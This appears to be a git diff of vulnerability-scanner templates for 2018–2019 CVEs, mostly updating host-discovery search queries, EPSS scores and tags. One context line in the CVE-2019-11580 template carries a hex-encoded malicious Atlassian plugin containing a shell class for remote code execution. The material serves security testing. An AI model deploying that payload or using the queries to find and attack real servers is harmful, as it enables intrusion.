b/http/cves/2018/CVE-2018-5233.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: getgrav product: grav_cms - shodan-query: html:"Grav CMS" + shodan-query: + - html:"Grav CMS" + - http.html:"grav cms" fofa-query: body="grav cms" tags: cve,cve2018,xss,grav,getgrav diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 42d6e8e136..42ba6c036c 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: sugarcrm product: sugarcrm - shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - google-query: intext:"SugarCRM Inc. All Rights Reserved" - fofa-query: body="sugarcrm inc. all rights reserved" + shodan-query: + - http.html:"SugarCRM Inc. All Rights Reserved" + - http.title:sugarcrm + - http.html:"sugarcrm inc. all rights reserved" + fofa-query: + - body="sugarcrm inc. all rights reserved" + - title=sugarcrm + google-query: + - intext:"SugarCRM Inc. All Rights Reserved" + - intitle:sugarcrm + - intext:"sugarcrm inc. all rights reserved" tags: cve2018,cve,sugarcrm,xss,edb http: diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index ceddc694fa..2ab0e02d95 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -28,7 +28,10 @@ info: max-request: 1 vendor: zeit product: next.js - shodan-query: html:"/_next/static" + shodan-query: + - html:"/_next/static" + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" tags: cve2018,cve,nextjs,lfi,traversal,zeit diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index e491283770..795bd92f3b 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -19,17 +19,25 @@ info: cvss-score: 6.1 cve-id: CVE-2018-6200 cwe-id: CWE-601 - epss-score: 0.00141 - epss-percentile: 0.48943 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vbulletin product: vbulletin - google-query: intext:"powered by vbulletin" - shodan-query: http.title:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.title:"powered by vbulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve,cve2018,redirect,vbulletin http: diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 9555cd9020..8688ccbff7 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-6530 cwe-id: CWE-78 epss-score: 0.93644 - epss-percentile: 0.99057 + epss-percentile: 0.99102 cpe: cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6605.yaml b/http/cves/2018/CVE-2018-6605.yaml index e78d4b6ca4..3a85283d87 100644 --- a/http/cves/2018/CVE-2018-6605.yaml +++ b/http/cves/2018/CVE-2018-6605.yaml @@ -23,9 +23,10 @@ info: vendor: zh_baidumap_project product: zh_baidumap framework: joomla\! - fofa-query: app="Joomla!-网站安装" - tags: cve,cve2018,joomla,sqli - + fofa-query: + - app="Joomla!-网站安装" + - app="joomla!-网站安装" + tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 8cfdc5acb1..8fb53faba4 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: dedecms product: dedecms - fofa-query: body="dedecms" - shodan-query: http.html:"dedecms" + shodan-query: + - http.html:"dedecms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + fofa-query: + - body="dedecms" + - app="dedecms" tags: cve,cve2018,dedecms http: diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index ea5dbc252f..ddedd992b0 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -25,10 +25,12 @@ info: max-request: 1 vendor: titool product: printmonitor - shodan-query: title:"PrintMonitor" - product": printmonitor + shodan-query: + - title:"PrintMonitor" + - http.title:"printmonitor" fofa-query: title="printmonitor" google-query: intitle:"printmonitor" + product": printmonitor tags: cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2018/CVE-2018-7314.yaml b/http/cves/2018/CVE-2018-7314.yaml index 51ebd26670..a9ca01dec4 100644 --- a/http/cves/2018/CVE-2018-7314.yaml +++ b/http/cves/2018/CVE-2018-7314.yaml @@ -24,9 +24,10 @@ info: vendor: mlwebtechnologies product: prayercenter framework: joomla\! - fofa-query: app="Joomla!-网站安装" - tags: cve,cve2018,joomla,sqli - + fofa-query: + - app="Joomla!-网站安装" + - app="joomla!-网站安装" + tags: cve,cve2018,joomla,sqli,joomla\!,mlwebtechnologies variables: num: "{{rand_int(800000000, 1000000000)}}" diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 2146473a79..e9416713ee 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-7422 cwe-id: CWE-22 epss-score: 0.94711 - epss-percentile: 0.99202 + epss-percentile: 0.99255 cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 300f5b46da..4ce8ed79e0 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive http: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index fdc40e94e4..7d74d88633 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -26,7 +26,9 @@ info: max-request: 4 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb http: diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 4304af2aef..6171168059 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: yzmcms product: yzmcms - shodan-query: title:"YzmCMS" - fofa-query: title="YzmCMS" + shodan-query: + - title:"YzmCMS" + - http.title:"yzmcms" + fofa-query: + - title="YzmCMS" + - title="yzmcms" google-query: intitle:"yzmcms" tags: cve,cve2018,packetstorm,yzmcms,cms,xss diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 4108c5e25d..8952662f24 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -13,20 +13,27 @@ info: reference: - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ - https://nvd.nist.gov/vuln/detail/CVE-2018-7700 + - https://github.com/0ps/pocassistdb + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2018-7700 cwe-id: CWE-352 - epss-score: 0.73235 - epss-percentile: 0.97827 + epss-score: 0.50599 + epss-percentile: 0.97528 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dedecms product: dedecms - fofa-query: body="dedecms" - shodan-query: http.html:"dedecms" + shodan-query: + - http.html:"dedecms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + fofa-query: + - body="dedecms" + - app="dedecms" tags: cve,cve2018,dedecms,rce http: diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 7c5ec277eb..b3de60671d 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -32,7 +32,9 @@ info: max-request: 1 vendor: apache product: activemq - shodan-query: cpe:"cpe:2.3:a:apache:activemq" + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: cve2018,cve,apache,activemq,xss http: diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 966921ddf1..87f70b3915 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: body="ofbiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2018,apache,ofbiz,xxe http: diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index f1657ce6af..808deae28a 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.01105 - epss-percentile: 0.8294 + epss-percentile: 0.84452 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 93bc03125b..8cbd4e73e9 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -14,13 +14,14 @@ info: - https://www.exploit-db.com/exploits/44495/ - https://github.com/Kyhvedn/CVE_Description/blob/master/Cobub_Razor_0.8.0_more_physical_path_leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2018-8770 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-8770 cwe-id: CWE-200 - epss-score: 0.00197 - epss-percentile: 0.57527 + epss-score: 0.00196 + epss-percentile: 0.57017 cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 342b8ce4f8..5ada80fe34 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -27,7 +27,7 @@ info: product: responsive_mega_menu_pro framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2018,prestashop,rce,sqli + tags: cve,cve2018,prestashop,rce,sqli,responsive_mega_menu_pro_project variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 22630800df..49b400f20f 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -14,13 +14,14 @@ info: - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b - https://nvd.nist.gov/vuln/detail/CVE-2018-9845 - https://github.com/ether/etherpad-lite/blob/develop/CHANGELOG.md + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9845 cwe-id: CWE-178 epss-score: 0.01393 - epss-percentile: 0.84966 + epss-percentile: 0.86371 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 83b03912fd..66a384ae25 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -28,9 +28,16 @@ info: max-request: 2 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub http: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 4e292cc145..06215e719a 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -28,8 +28,14 @@ info: max-request: 2 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2019,cve,apache,xss,tomcat,seclists,edb variables: diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index 4070e89092..0d6557d0e7 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -20,15 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-1321 - epss-score: 0.94817 - epss-percentile: 0.99114 + epss-score: 0.95364 + epss-percentile: 0.99359 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2019,tenable,packetstorm,struts,rce,apache variables: diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 5e0400ae6b..f560fa7e6f 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve,cve2019,apache,htmli,injection http: diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 2e00f421b2..65128eacf7 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve,cve2019,redirect,apache,server http: diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 8b5433f66f..0149d63c0d 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46774 + epss-percentile: 0.47703 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index c3d9302ed4..eef7fbedec 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -26,7 +26,10 @@ info: max-request: 2 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" fofa-query: icon_hash=81586312 tags: cve,cve2019,jenkins diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 5911a3c978..909292b0a2 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: dotnetblogengine product: blogengine.net - shodan-query: http.html:"Blogengine.net" + shodan-query: + - http.html:"Blogengine.net" + - http.html:"blogengine.net" fofa-query: body="blogengine.net" tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 23624a316b..54b91783c0 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -26,7 +26,9 @@ info: vendor: mongo-express_project product: mongo-express framework: node.js - shodan-query: http.title:"Mongo Express" + shodan-query: + - http.title:"Mongo Express" + - http.title:"mongo express" fofa-query: title="mongo express" google-query: intitle:"mongo express" tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 788e9a272d..25db910825 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -29,7 +29,9 @@ info: vendor: kubernetes product: kubernetes shodan-query: http.title:"kubernetes web view" - fofa-query: title="kubernetes web view" + fofa-query: + - title="kubernetes web view" + - app="kubernetes-enterprise-manager" google-query: intitle:"kubernetes web view" tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 5930885d19..2aca65ebaf 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: carel product: pcoweb_card_firmware - shodan-query: http.html:"pCOWeb" + shodan-query: + - http.html:"pCOWeb" + - http.html:"pcoweb" fofa-query: body="pcoweb" tags: cve,cve2019,pcoweb,xss,carel,edb diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 68d3c30a9a..5686a5b6a6 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -27,10 +27,14 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: http.html:"welcome.cgi?p=logo" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - http.html:"welcome.cgi?p=logo" + - http.title:"ivanti connect secure" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev + tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti http: - method: GET diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 05f9053070..2369be800c 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: atlassian product: crowd - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth variables: plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}' diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 89c27951ee..a8456d0ef5 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,ssti,rce,kev http: diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index e699734f44..31a83b5fa4 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -20,13 +20,13 @@ info: cvss-score: 6.1 cve-id: CVE-2019-12581 cwe-id: CWE-79 - epss-score: 0.00642 - epss-percentile: 0.7705 - cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00358 + epss-percentile: 0.7209 + cpe: cpe:2.3:h:zyxel:uag2100:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel - product: uag2100_firmware + product: uag2100 shodan-query: http.title:"ZyWall" fofa-query: title="zywall" google-query: intitle:"zywall" diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 51fcfdcb65..5129fec867 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -28,9 +28,19 @@ info: max-request: 2 vendor: icewarp product: mail_server - shodan-query: title:"icewarp" - google-query: Powered By IceWarp 10.4.4 - fofa-query: title="icewarp server administration" + shodan-query: + - title:"icewarp" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - Powered By IceWarp 10.4.4 + - intitle:"icewarp" + - powered by icewarp 10.4.4 + - intitle:"icewarp server administration" tags: cve,cve2019,packetstorm,lfi,icewarp http: diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index d5b46be579..f196816b12 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.title:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve2019,cve,csrf,edb,phpmyadmin diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index d930b0f553..4d0453a4b4 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: livezilla product: livezilla - shodan-query: http.html:LiveZilla + shodan-query: + - http.html:LiveZilla + - http.html:livezilla fofa-query: body=livezilla tags: cve,cve2019,xss,edb,packetstorm,livezilla diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 700fcf5769..ada8b5bb89 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index ad13268299..527e8f032d 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve2019,cve,unauth,oast,tenable,citrix,rce diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 1af5d51a6e..9154e3b1f0 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable diff --git a/http/cves/2019/CVE-2019-12988.yaml 